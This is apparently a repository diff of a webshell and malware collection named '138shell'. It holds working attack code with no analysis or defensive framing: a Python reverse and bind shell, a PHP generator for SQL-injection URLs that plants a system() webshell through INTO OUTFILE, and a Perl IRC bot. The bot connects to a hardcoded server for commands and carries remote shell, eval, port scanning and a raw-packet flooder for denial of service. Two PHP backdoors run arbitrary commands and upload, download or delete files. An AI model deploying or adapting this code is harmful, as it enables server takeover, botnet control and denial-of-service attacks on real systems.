system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF

1010
138shell/P/PHP Shell.php.txt Normal file
View file

File diff suppressed because it is too large Load diff

2553
138shell/P/PHPRemoteView.txt Normal file
View file

File diff suppressed because it is too large Load diff

121
138shell/P/Phyton Shell.py.txt Normal file
View file

@ -0,0 +1,121 @@
#!/usr/bin/env python
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
# #
# alpha #
# #
# #
# usage: #
# % ./d00r -b password port #
# % ./d00r -r password port host #
# % nc host port #
# % nc -l -p port (please use netcat) #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import os, sys, socket, time
# =================== var =======
MAX_LEN=1024
SHELL="/bin/zsh -c"
TIME_OUT=300 #s
PW=""
PORT=""
HOST=""
# =================== funct =====
# shell - exec command, return stdout, stderr; improvable
def shell(cmd):
sh_out=os.popen(SHELL+" "+cmd).readlines()
nsh_out=""
for i in range(len(sh_out)):
nsh_out+=sh_out[i]
return nsh_out
# action?
def action(conn):
conn.send("\nPass?\n")
try: pw_in=conn.recv(len(PW))
except: print "timeout"
else:
if pw_in == PW:
conn.send("j00 are on air!\n")
while True:
conn.send(">>> ")
try:
pcmd=conn.recv(MAX_LEN)
except:
print "timeout"
return True
else:
#print "pcmd:",pcmd
cmd=""#pcmd
for i in range(len(pcmd)-1):
cmd+=pcmd[i]
if cmd==":dc":
return True
elif cmd==":sd":
return False
else:
if len(cmd)>0:
out=shell(cmd)
conn.send(out)
# =================== main ======
argv=sys.argv
if len(argv)<4:
print "error; help: head -n 16 d00r.py"
sys.exit(1)
elif argv[1]=="-b":
PW=argv[2]
PORT=argv[3]
elif argv[1]=="-r" and len(argv)>4:
PW=argv[2]
PORT=argv[3]
HOST=argv[4]
else: exit(1)
PORT=int(PORT)
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
#sys.argv[0]="d00r"
# exit father proc
if os.fork()!=0:
sys.exit(0)
# associate the socket
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(TIME_OUT)
if argv[1]=="-b":
sock.bind(('localhost', PORT))
sock.listen(0)
run=True
while run:
if argv[1]=="-r":
try: sock.connect( (HOST, PORT) )
except:
print "host unreachable"
time.sleep(5)
else: run=action(sock)
else:
try: (conn,addr)=sock.accept()
except:
print "timeout"
time.sleep(1)
else: run=action(conn)
# shutdown the sokcet
if argv[1]=="-b": conn.shutdown(2)
else:
try: sock.send("")
except: time.sleep(1)
else: sock.shutdown(2)

1456
138shell/P/Private-i3lue.txt Normal file
View file

File diff suppressed because it is too large Load diff

37
138shell/P/pHpINJ.php.txt Normal file
View file

@ -0,0 +1,37 @@
<?php
?>
<html>
<head>
<title>|| .::News Remote PHP Shell Injection::. || </title>
</head>
<body>
<header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />
<?php
if (isset($_POST['url'])) {
$url = $_POST['url'];
$path2news = $_POST['path2news'];
$outfile = $_POST ['outfile'];
$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";
$sql = urlencode($sql);
$expurl= $url."?id=".$sql ;
echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";
}
else
{
?>
Url to index.php: <br />
<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">
<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br />
Server Path to Shell: <br />
Full server path to a writable file which will contain the Php Shell <br />
<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />
<input type = "submit" value = "Create Exploit"> <br /> <br />
<?php
}
?>
</body>
</html>

687
138shell/P/perlbot.pl.txt Normal file
View file

@ -0,0 +1,687 @@
#!/usr/bin/perl
# =========================
# Perl Bot by LKY
# Obrigado a italo, false e Ragde :D
# =========================
# Componentes
use IO::Socket;
use Socket;
use IO::Select;
# Configura??es
my $servidor ='208.98.16.20';
my $porta ='9002';
my $nick =DDos;
my $ircname = 'DDos';
my $realname = "DDos";
my @canais=("#SSH");
my @adms=("Kelserific","Puna","nod32");
#my $processo = '/bin/bash'; #se comantar nao mostra o PID
#Flood Control
my $linas_max=6;
my $sleep=3;
#Acesso a Shel - 1 ON 0 OFF
my $secv = 1;
##############################
my $VERSAO = '0.1';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
chdir("/tmp/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
#diretorio,config do server e pid
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
#######
#Bot em si!
#######
$sel_cliente = new IO::Select();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = new IO::Socket::INET(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION LKY bot-$VERSAO\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!hdr)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!hdr" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143","6667","59","7000","110","65535","0");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :4STATUS - LKY");
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Tempo:1 $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total pacotes:1 ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :14Total bytes:1 ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :14M?dia de envio:4 ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diert?? inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}

71
138shell/P/php-backdoor.txt Normal file
View file

@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->

1312
138shell/P/php-include-w-shell.txt Normal file
View file

File diff suppressed because it is too large Load diff

133
138shell/P/phpbackdoor15.txt Normal file
View file

@ -0,0 +1,133 @@
<?php
function good_link($link)
{
$link=ereg_replace("/+","/",$link);
$link=ereg_replace("/[^/(..)]+/\.\.","/",$link);
$link=ereg_replace("/+","/",$link);
if(!strncmp($link,"./",2) && strlen($link)>2)$link=substr($link,2);
if($link=="")$link=".";
return $link;
}
$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:".";
$dir=good_link($dir);
$rep=opendir($dir);
chdir($dir);
if(isset($_REQUEST["down"]) && $_REQUEST["down"]!="")
{
header("Content-Type: application/octet-stream");
header("Content-Length: ".filesize($_REQUEST["down"]));
header("Content-Disposition: attachment; filename=".basename($_REQUEST["down"]));
readfile($_REQUEST["down"]);
exit();
}
?>
<html>
<head><title>LOTFREE PHP Backdoor v1.5</title></head>
<body>
<br>
<?php
echo "Actuellement dans <b>".getcwd()."</b><br>\n";
echo "<b>dir = '$dir'</b><br>\n";
echo "Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez sur une croix pour effacer un fichier !<br><br>\n";
if(isset($_REQUEST['cmd']) && $_REQUEST['cmd']!="")
{
echo "<pre>\n";
system($_REQUEST['cmd']);
echo "</pre>\n";
}
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"]))
{
if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"])
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"])))
{
echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n";
}
else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n";
}
else echo "fichier trop gros!<br>\n";
}
if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="")
{
if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n";
else echo "Impossible de supprimer le fichier<br>\n";
}
?>
<hr>
<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue">
<?php
$t_dir=array();
$t_file=array();
$i_dir=0;
$i_file=0;
while($x=readdir($rep))
{
if(is_dir($x))$t_dir[$i_dir++]=$x;
else $t_file[$i_file++]=$x;
}
closedir($rep);
while(1)
{
?>
<tr>
<td width="20%" bgcolor="lightgray" valign="top">
<?php
if($x=each($t_dir))
{
$name=$x["value"];
if($name=='.'){}
elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n";
else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n";
}
?>
</td>
<td width='78%'<?php
if($y=each($t_file))
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n";
else echo ">\n";
echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n";
}
else echo ">\n";
?>
</td>
<td valign='center' width='2%'<?php
if($y)
{
if($y["key"]%2==0)echo " bgcolor='lightgreen'";
echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>";
}
else echo ">\n";
?></td>
</tr>
<?php
if(!$x && !$y)break;
}
?>
</table>
<hr>
<br>
<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br>
<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!">
</form><br>
Uploader un fichier dans le repertoire courant :<br>
<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>">
<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000">
<input type="submit" value="upl0ad!"></form><br>
<br>
<center>
PHP Backdoor Version 1.5<br>
by sirius_black / LOTFREE TEAM<br>
Execute commands, browse the filesystem<br>
Upload, download and delete files...<br>
<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br>
</center>
</body>
</html>

1413
138shell/P/phpjackal.txt Normal file
View file

File diff suppressed because it is too large Load diff

177
138shell/P/phpshell17.txt Normal file
View file

@ -0,0 +1,177 @@
<?php
define(´PHPSHELL_VERSION´, ´1.7´);
/*
**************************************************************
* PHP Shell *
**************************************************************
$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $
PHP Shell is aninteractive PHP-page that will execute any command
entered. See the files README and INSTALL or http://www.gimpster.com
for further information.
Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
